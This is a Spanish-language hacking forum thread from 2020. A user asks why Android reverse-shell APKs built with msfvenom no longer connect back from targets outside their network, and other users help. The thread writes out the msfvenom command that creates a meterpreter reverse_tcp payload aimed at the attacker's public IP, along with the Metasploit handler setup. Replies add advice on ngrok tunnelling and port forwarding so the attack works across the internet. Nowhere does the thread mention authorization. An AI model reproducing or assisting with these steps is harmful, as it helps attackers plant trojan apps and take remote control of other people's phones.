elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Problema, ataques fuera de red.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema, ataques fuera de red.  (Leído 5,255 veces)
painpills

Desconectado Desconectado

Mensajes: 40


404


Ver Perfil WWW
Problema, ataques fuera de red.
« en: 6 Marzo 2020, 04:21 am »

Hola, hace días que estuve probando ataques fuera de red utilizando apk's creadas con msfvenom. Al principio funcionaba todo correctamente, configuré mi ip local como DMZ de mi router para evitar problemas con los puertos, e incluso pude utilizar NO-IP con normalidad.

El problema es que hace un día o dos, simplemente han dejado de funcionarme los ataques fuera de red, Kali cambió la ip local de mi máquina pero inmediatamente actualicé el DMZ de mi router. Entonces pensé que podría ser un problema de NO-IP y decidí generar las apk's directamente con mi mi pública, de la siguiente manera.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R>/root/Escritorio/aplicacion.apk

Luego de haber generado la aplicación me pongo a la escucha de la siguiente forma.

1) use exploit/multi/hander
2) set payload android/meterpreter/reverse_tcp
3) set lport=<mi ip local> y también set lport=444
5) exploit

Aún configurando la aplicación de esa manera sigue sin funcionar  :-\
¿Alguien tiene alguna idea de qué puede estar ocasionando este problema o como solucionarlo?

¿podría el cambio de ip haber ocasionado eso? Cambió tanto mi ip pública, como la local.


Gracias.
En línea

UnaiiM

Desconectado Desconectado

Mensajes: 151


The art of programming is the skill of controlling


Ver Perfil
Re: Problema, ataques fuera de red.
« Respuesta #1 en: 6 Marzo 2020, 09:51 am »

Haber pero si lo haces fuera de la red local lo lógico es usar algo como ngrok. Ya que por lo que entiendo tu le estas diciendo al exploit que al ser ejecutado se conecte a una ip de una red la cual la persona que quieres atacar no esta en esa red.   :rolleyes:
Haber ngrok haces público tu local host.
No se si me equivoco, ya que no estoy muy informado en este tema,...
Salu2!
« Última modificación: 6 Marzo 2020, 09:59 am por Depredador » En línea

painpills

Desconectado Desconectado

Mensajes: 40


404


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #2 en: 9 Marzo 2020, 23:50 pm »

No es una solución en si, ya que antes podía realizar ese tipo de tareas sin necesidad de otras aplicaciones, simplemente metasploit y no-ip, pero con el problema que se me ha presentado ngrok me ha sido muy útil, gracias por la información.  ::)
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #3 en: 10 Marzo 2020, 01:21 am »

Tienes los puertos del router abiertos?

Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444.
Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.

Por comodidad puedes usar print working directory en lugar de poner la ruta manual.

msfvenom -p android/meterpreter/reverse_tcp  lhost=<mi ip publica>  lport=4444 R > pwd

Cuando sea así prueba con el netcat a la escucha en el puerto 4444.

A mi me van horribles las .apk generadas con msfvenom.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

painpills

Desconectado Desconectado

Mensajes: 40


404


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #4 en: 10 Marzo 2020, 07:41 am »

Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.

La única herramienta que instalé en ese entonces fue NO-IP.

Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes  ;-)




Por lo que pones creas el apk apuntando al puerto 4444 y te pones en la escucha al 444.
Hay puertos externos y puertos internos. Tienes que abrir el puerto externo en la dirección que apunte el TCP reverso y abrir el interno hacia la máquina de tu red que está a la escucha.

« Última modificación: 10 Marzo 2020, 07:49 am por N0I$E » En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.399


Turn off the red ligth


Ver Perfil WWW
Re: Problema, ataques fuera de red.
« Respuesta #5 en: 10 Marzo 2020, 18:24 pm »

Perdón, esa parte fue un error mío en la publicación, pongo a metasploit a escuchar el mismo puerto que va en el apk. y sobre los puertos pues creo que sí, lo que sucede es que la empresa que me presta el servicio de internet bloquea las opciones que me dejan abrir puertos manualmente, por eso configuré mi ip local como DMZ y eso me funcionó por un tiempo, según entiendo lo que hace el DMZ es redireccionar las conexiones que llegan a mi router hacia mi ip local y abre los puertos automáticamente cuando es necesario(que alguien me corrija si me equivoco), y aunque mi DMZ está configurado correctamente no puedo realizar ataques fuera de red sino es con ngrok que abre un canal para poder hacer el ataque. Entonces, no sé si se debe a alguna configuración erronea en mi sistema operativo(kali linux) o a la instalación de otra herramienta.

La única herramienta que instalé en ese entonces fue NO-IP.

Espero que alguien pueda ayudarme con eso, ya que supongo que es algo cansino que se escriba en el foro únicamente por dudas, espero avanzar pronto en esto para poder realizar mis aportes  ;-)



Comprueba con netcat si te funciona correctamente la apertura y cierre de puertos.
Si no te funciona llama a tu ISP y dile que abriste los puertos y no te llegan los paquetes, que te habiliten abrir y cerrar puertos cuando consideres, si no te cambias de compañía.

Si pones tu equipo como DMZ lo expones a internet y si no tienes un firewall de internet a tu DMZ y otro firewall que evite conexiones de tu DMZ a tu red local estás totalmente expuesto.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema El subindice esta fuera de intervalo
Programación Visual Basic
ninto33 5 8,348 Último mensaje 8 Febrero 2010, 08:19 am
por BlackZeroX
problema con politica proxy fuera de la red empresarial
Redes
carlos_zr2003 1 2,249 Último mensaje 13 Octubre 2010, 19:52 pm
por y0g-s0th0th
Problema con SocualEngineerToolkit (No registra datos fuera de LAN)
Hacking
bastri 1 2,614 Último mensaje 5 Marzo 2012, 00:21 am
por bastri
problema con backdoor fuera de lan
Dudas Generales
Wilkin07 1 2,506 Último mensaje 29 Septiembre 2016, 19:25 pm
por simorg
Ataques fuera de la red local...
Hacking
UnaiiM 0 1,959 Último mensaje 12 Mayo 2019, 14:23 pm
por UnaiiM
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines